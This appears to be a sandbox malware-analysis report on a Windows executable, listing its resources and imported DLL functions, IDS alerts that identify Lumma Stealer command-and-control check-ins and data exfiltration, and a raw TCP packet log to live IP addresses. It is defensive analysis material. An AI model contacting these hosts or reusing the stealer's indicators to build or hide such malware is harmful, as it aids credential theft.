                                                                                                                                                                                              RT_ICON0x150c280x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                              RT_ICON0x1531d00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                              RT_ICON0x1542780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                              RT_ICON0x1547200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                              RT_ICON0x1589480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                              RT_ICON0x15aef00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                              RT_ICON0x15bf980x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                              RT_ICON0x15c4400x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                              RT_ICON0x1606680x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                              RT_ICON0x162c100x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                              RT_ICON0x163cb80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                              RT_ICON0x1641600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                              RT_ICON0x1683880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                              RT_ICON0x16a9300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                              RT_ICON0x16b9d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                              RT_ICON0x16be800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 0EnglishUnited States0.0374940954180444
                                                                                                                                                                                              RT_ICON0x1700a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.06504149377593361
                                                                                                                                                                                              RT_ICON0x1726500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.06660412757973734
                                                                                                                                                                                              RT_ICON0x1736f80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.12677304964539007
                                                                                                                                                                                              RT_MENU0x173ba00x94eMatlab v4 mat-file (little endian) O, numeric, rows 4587536, columns 7077993, imaginaryEnglishUnited States0.35516372795969775
                                                                                                                                                                                              RT_MENU0x1744f00x1138dataEnglishUnited States0.22549909255898368
                                                                                                                                                                                              RT_DIALOG0x14c0f80x284dataEnglishUnited States0.5295031055900621
                                                                                                                                                                                              RT_DIALOG0x14c8280x18edataEnglishUnited States0.6080402010050251
                                                                                                                                                                                              RT_DIALOG0x14b8800x54adataEnglishUnited States0.37961595273264404
                                                                                                                                                                                              RT_DIALOG0x14bdd00x14adataEnglishUnited States0.6212121212121212
                                                                                                                                                                                              RT_DIALOG0x14b5300x34edataEnglishUnited States0.450354609929078
                                                                                                                                                                                              RT_DIALOG0x14bf200x1d2dataEnglishUnited States0.5
                                                                                                                                                                                              RT_DIALOG0x14b1d80x16adataEnglishUnited States0.6353591160220995
                                                                                                                                                                                              RT_DIALOG0x14c6600x11adataEnglishUnited States0.6418439716312057
                                                                                                                                                                                              RT_DIALOG0x14b3480x1e2dataEnglishUnited States0.6182572614107884
                                                                                                                                                                                              RT_DIALOG0x14c5480x112dataEnglishUnited States0.6240875912408759
                                                                                                                                                                                              RT_DIALOG0x14c3800x1c6dataEnglishUnited States0.5925110132158591
                                                                                                                                                                                              RT_DIALOG0x14c7800xa4dataEnglishUnited States0.7560975609756098
                                                                                                                                                                                              RT_DIALOG0x17ab880xe8dataEnglishUnited States0.6336206896551724
                                                                                                                                                                                              RT_STRING0x17afe00xdadataEnglishUnited States0.41284403669724773
                                                                                                                                                                                              RT_STRING0x17b0c00x34dataEnglishUnited States0.5769230769230769
                                                                                                                                                                                              RT_STRING0x17b0f80x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                                                              RT_STRING0x17b1800x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                              RT_STRING0x17b1b00x14adataEnglishUnited States0.5060606060606061
                                                                                                                                                                                              RT_STRING0x17b3000x4e2dataEnglishUnited States0.376
                                                                                                                                                                                              RT_STRING0x17bb780x2a2dataEnglishUnited States0.28338278931750743
                                                                                                                                                                                              RT_STRING0x17b8980x2dcdataEnglishUnited States0.36885245901639346
                                                                                                                                                                                              RT_STRING0x17b7e80xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                              RT_STRING0x17c5500xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                              RT_STRING0x17be200x4c4dataEnglishUnited States0.3221311475409836
                                                                                                                                                                                              RT_STRING0x17c2e80x264dataEnglishUnited States0.3741830065359477
                                                                                                                                                                                              RT_STRING0x17c6300x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                              RT_ACCELERATOR0x1485f80x120dataEnglishUnited States0.5381944444444444
                                                                                                                                                                                              RT_GROUP_CURSOR0x14add00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                              RT_GROUP_CURSOR0x14b0700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                              RT_GROUP_CURSOR0x14b1c00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                              RT_GROUP_CURSOR0x14ac800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                              RT_GROUP_CURSOR0x14af200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                              RT_GROUP_CURSOR0x179d180x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                              RT_GROUP_CURSOR0x179f300x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                              RT_GROUP_CURSOR0x17a1480x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                              RT_GROUP_CURSOR0x17a3600x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0
                                                                                                                                                                                              RT_GROUP_CURSOR0x17a5780x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                              RT_GROUP_ICON0x1546e00x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                              RT_GROUP_ICON0x15c4000x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                              RT_GROUP_ICON0x1641200x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                              RT_GROUP_ICON0x173b600x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                              RT_GROUP_ICON0x16be400x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                              RT_VERSION0x1487180x35cdataEnglishUnited States0.45232558139534884
                                                                                                                                                                                              RT_ANICURSOR0x148c600x1ee6RIFF (little-endian) data, animated cursor "Small Hourglass" PPEscherEnglishUnited States0.08103666245259165
                                                                                                                                                                                              RT_MANIFEST0x148a780x1e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5503080082135524
                                                                                                                                                                                              None0x14c9b80x47dataEnglishUnited States0.9436619718309859

                                                                                                                                                                                              Imports

                                                                                                                                                                                              DLLImport
                                                                                                                                                                                              KERNEL32.dllHeapSize, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetStartupInfoA, GetModuleFileNameA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, CompareStringA, CompareStringW, VirtualAlloc, IsBadWritePtr, LCMapStringA, LCMapStringW, SetUnhandledExceptionFilter, GetFileType, IsBadReadPtr, IsBadCodePtr, GetCPInfo, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, GetStringTypeA, GetStringTypeW, GetACP, GetOEMCP, SetEnvironmentVariableA, GetDriveTypeA, GetLocaleInfoW, SetStdHandle, GetLocalTime, FindResourceA, GlobalAddAtomA, GetProfileStringA, InterlockedExchange, GetSystemTime, GetTimeZoneInformation, ExitThread, CreateThread, HeapReAlloc, GetDriveTypeW, RaiseException, HeapFree, HeapAlloc, RtlUnwind, GetStartupInfoW, SetErrorMode, SystemTimeToFileTime, LocalFileTimeToFileTime, GetFileSize, FindResourceExW, GetCurrentDirectoryW, GlobalFlags, FindNextFileW, lstrcmpiW, GetThreadLocale, GetStringTypeExW, GetVolumeInformationW, FindFirstFileW, FindClose, UnlockFile, LockFile, SetFilePointer, DuplicateHandle, FileTimeToLocalFileTime, FileTimeToSystemTime, GetProfileIntW, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetProcessVersion, GetDiskFreeSpaceW, GetFileTime, SetFileTime, GetFullPathNameW, GetTempFileNameW, GetFileAttributesW, GlobalFree, lstrcmpW, lstrcmpA, lstrcmpiA, GetCurrentThread, GlobalGetAtomNameW, CreateEventW, SuspendThread, SetEvent, LoadLibraryA, GetVersion, lstrcatW, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, InterlockedDecrement, InterlockedIncrement, MulDiv, GetModuleHandleA, SetLastError, lstrlenA, ExitProcess, GlobalAlloc, GlobalLock, GlobalUnlock, SizeofResource, LoadResource, LockResource, SetCurrentDirectoryW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetPrivateProfileStringW, FlushFileBuffers, WriteFile, ReadFile, SetFilePointerEx, SetEndOfFile, GetFileSizeEx, CreateFileW, MultiByteToWideChar, GetWindowsDirectoryW, GetModuleFileNameW, LoadLibraryW, WideCharToMultiByte, FreeLibrary, GetCurrentProcess, GetTempPathW, CreateDirectoryW, GetFileAttributesExW, GetLongPathNameW, GetShortPathNameW, GetLastError, LocalFree, MoveFileW, DeleteFileW, SetThreadPriority, Sleep, AttachConsole, GenerateConsoleCtrlEvent, FreeConsole, TerminateProcess, CreateProcessW, GetExitCodeProcess, CloseHandle, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, DeleteCriticalSection, GetCurrentThreadId, GetModuleHandleW, GetProcAddress, GetVersionExW, lstrcpynW, lstrcpyW, WaitForSingleObject, ResumeThread, FindResourceW, GetTickCount, lstrlenW, GetCurrentDirectoryA
                                                                                                                                                                                              USER32.dllMoveWindow, SetWindowTextW, IsDialogMessageW, IsDlgButtonChecked, SetDlgItemTextW, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, PeekMessageW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetTopWindow, MessageBoxW, WinHelpW, GetClassInfoW, RegisterClassW, TrackPopupMenu, SetWindowPlacement, GetDlgItem, GetWindowTextLengthW, GetWindowTextW, DestroyWindow, CreateWindowExW, DefWindowProcW, GetMessageTime, GetLastActivePopup, GetForegroundWindow, SystemParametersInfoW, GetWindowPlacement, wsprintfW, EndPaint, BeginPaint, GetWindowDC, SetWindowPos, LockWindowUpdate, CheckMenuItem, IsChild, GetMenu, SetMenu, IsIconic, ExitWindowsEx, DestroyIcon, GetMessageW, TranslateMessage, DispatchMessageW, InsertMenuW, FindWindowW, GetMenuStringW, CallNextHookEx, keybd_event, SetWindowsHookExW, TrackPopupMenuEx, UnhookWindowsHookEx, GetMenuItemCount, WindowFromPoint, DestroyMenu, ShowWindow, GetCapture, IntersectRect, IsRectEmpty, SetRectEmpty, ReleaseDC, DrawFocusRect, GetSysColor, SetCursor, IsWindowEnabled, SetFocus, RegisterWindowMessageW, GetWindow, CreatePopupMenu, GetMessagePos, RedrawWindow, BeginDeferWindowPos, LoadCursorW, DestroyCursor, UnregisterClassW, GetWindowTextLengthA, GetDlgCtrlID, HideCaret, ShowCaret, ExcludeUpdateRgn, OffsetRect, EndDeferWindowPos, GetSystemMenu, RemovePropW, GetPropW, CallWindowProcW, SetWindowLongW, SetPropW, GetMenuItemID, GetMenuDefaultItem, LoadIconW, KillTimer, SetTimer, SetParent, AppendMenuW, InflateRect, ClientToScreen, GetCursorPos, GetKeyState, GetNextDlgTabItem, GetClassNameW, CharUpperW, GetDCEx, GetSysColorBrush, wvsprintfW, LoadStringW, EndDialog, CreateDialogIndirectParamW, DeleteMenu, GetParent, GrayStringW, DrawTextW, TabbedTextOutW, ScreenToClient, GetFocus, InvalidateRect, PtInRect, SetCapture, ReleaseCapture, UpdateWindow, CheckMenuRadioItem, IsWindowVisible, SetActiveWindow, SetForegroundWindow, PostMessageW, LoadMenuW, GetDC, GetWindowRect, LoadBitmapW, GetSubMenu, SetMenuDefaultItem, SendMessageW, EnableWindow, GetClientRect, GetWindowTextA, DrawTextA, GetClassInfoA, DefDlgProcA, DefWindowProcA, MapDialogRect, GetAsyncKeyState, ShowOwnedPopups, PostQuitMessage, BringWindowToTop, UnpackDDElParam, ReuseDDElParam, GetDesktopWindow, TranslateAcceleratorW, LoadAcceleratorsW, GetActiveWindow, ValidateRect, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, SetRect, EnableMenuItem, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, IsWindow, GetWindowLongW, CopyRect, GetSystemMetrics
                                                                                                                                                                                              GDI32.dllOffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, IntersectClipRect, SetViewportOrgEx, GetDeviceCaps, CreatePen, CreateSolidBrush, CreatePatternBrush, SetRectRgn, GetTextMetricsW, EnumFontFamiliesExW, SetMapMode, CreateRectRgn, CombineRgn, SetTextColor, SetBkMode, SetBkColor, SaveDC, GetClipBox, CreateRectRgnIndirect, ExtSelectClipRgn, SetStretchBltMode, StretchDIBits, SetDIBitsToDevice, RestoreDC, CreateDIBSection, DeleteDC, PatBlt, DeleteObject, SelectObject, GetBkMode, GetBkColor, GetTextExtentPoint32W, GetTextColor, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateBitmap, GetStockObject, GetObjectW, CreateDIBitmap, ExtTextOutA, GetTextExtentPointA, CreateFontIndirectW
                                                                                                                                                                                              comdlg32.dllGetSaveFileNameW, GetOpenFileNameW, GetFileTitleW
                                                                                                                                                                                              WINSPOOL.DRVClosePrinter, DocumentPropertiesW, OpenPrinterW
                                                                                                                                                                                              ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegQueryValueW, RegSetValueExW, RegCreateKeyW, RegSetValueW, RegDeleteKeyW, RegEnumKeyW, RegOpenKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegQueryValueExW, RegCreateKeyExW, RegDeleteValueW, SetFileSecurityW, GetFileSecurityW, RegEnumKeyExW
                                                                                                                                                                                              SHELL32.dllSHGetDesktopFolder, SHGetMalloc, SHGetFileInfoW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, DragQueryFileW, SHFileOperationW, SHGetSpecialFolderPathW, DragAcceptFiles, ShellExecuteW, DragFinish, ExtractIconW
                                                                                                                                                                                              COMCTL32.dllImageList_BeginDrag, ImageList_GetImageInfo, ImageList_DragEnter, _TrackMouseEvent, ImageList_Draw, ImageList_AddMasked, ImageList_DragLeave, ImageList_DragMove, ImageList_EndDrag, ImageList_Destroy, ImageList_Create, PropertySheetW, DestroyPropertySheetPage, CreatePropertySheetPageW, ImageList_DrawIndirect, ImageList_ReplaceIcon
                                                                                                                                                                                              ole32.dllCoUninitialize, CoCreateGuid, CoInitialize, CoCreateInstance
                                                                                                                                                                                              OLEAUT32.dllSysAllocString, SysFreeString
                                                                                                                                                                                              SHLWAPI.dllPathFileExistsW, PathFindExtensionW, PathMakePrettyW, PathFindFileNameW, PathRemoveFileSpecW, PathRenameExtensionW, PathIsRootW, PathIsDirectoryW, PathIsURLW
                                                                                                                                                                                              WINHTTP.dllWinHttpQueryHeaders, WinHttpCrackUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpOpen, WinHttpConnect, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpSendRequest, WinHttpQueryOption, WinHttpSetOption, WinHttpReceiveResponse

                                                                                                                                                                                              Possible Origin

                                                                                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                              EnglishUnited States

                                                                                                                                                                                              Network Behavior

                                                                                                                                                                                              Suricata IDS Alerts

                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                              2025-01-05T18:08:21.473777+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:21.980917+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449748104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:21.980917+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:22.455675+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:22.893251+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449750104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:22.893251+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449750104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:23.558002+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:24.778979+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:25.892738+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:27.381402+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:28.012510+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449754104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:28.599661+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:30.097347+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:30.874830+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449756104.21.21.63443TCP
                                                                                                                                                                                              2025-01-05T18:08:31.574321+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757185.161.251.21443TCP
                                                                                                                                                                                              2025-01-05T18:08:32.353536+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449758172.67.208.58443TCP
                                                                                                                                                                                              2025-01-05T18:08:32.720799+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1172.67.208.58443192.168.2.449758TCP

                                                                                                                                                                                              Network Port Distribution

                                                                                                                                                                                              TCP Packets

                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                              Jan 5, 2025 18:08:21.004404068 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.004455090 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.004529953 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.006983042 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.006999016 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.473702908 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.473777056 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.480381966 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.480401039 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.480618000 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.532427073 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.552786112 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.552800894 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.552880049 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.980932951 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.981055975 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.981096029 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.982517004 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.982532978 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.982569933 CET49748443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.982574940 CET44349748104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.994582891 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.994605064 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:21.994663000 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.994919062 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:21.994930983 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.455537081 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.455674887 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.456831932 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.456842899 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.457053900 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.458115101 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.458115101 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.458179951 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893264055 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893311024 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893342972 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893368006 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893371105 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893393040 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893425941 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893457890 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893465042 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893476009 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893534899 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893564939 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893570900 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893574953 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893646955 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893894911 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.893959045 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.894299984 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.894304991 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.894548893 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.894598007 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.894663095 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.894675016 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:22.894695997 CET49750443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:22.894700050 CET44349750104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:23.099025011 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:23.099066019 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:23.099163055 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:23.099437952 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:23.099450111 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:23.557915926 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:23.558001995 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:23.559485912 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:23.559498072 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:23.559703112 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:23.560764074 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:23.560863972 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:23.560906887 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:23.560976982 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:23.560985088 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.216820955 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.216924906 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.217031956 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.217187881 CET49751443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.217200041 CET44349751104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.313334942 CET49752443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.313369036 CET44349752104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.313452959 CET49752443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.313811064 CET49752443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.313822985 CET44349752104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.778856993 CET44349752104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.778979063 CET49752443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.780258894 CET49752443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.780270100 CET44349752104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.780510902 CET44349752104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:24.781949043 CET49752443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.782150030 CET49752443192.168.2.4104.21.21.63
                                                                                                                                                                                              Jan 5, 2025 18:08:24.782196045 CET44349752104.21.21.63192.168.2.4
                                                                                                                                                                                              Jan 5, 2025 18:08:25.256664991 CET44349752104.21.21.63192.168.2.4
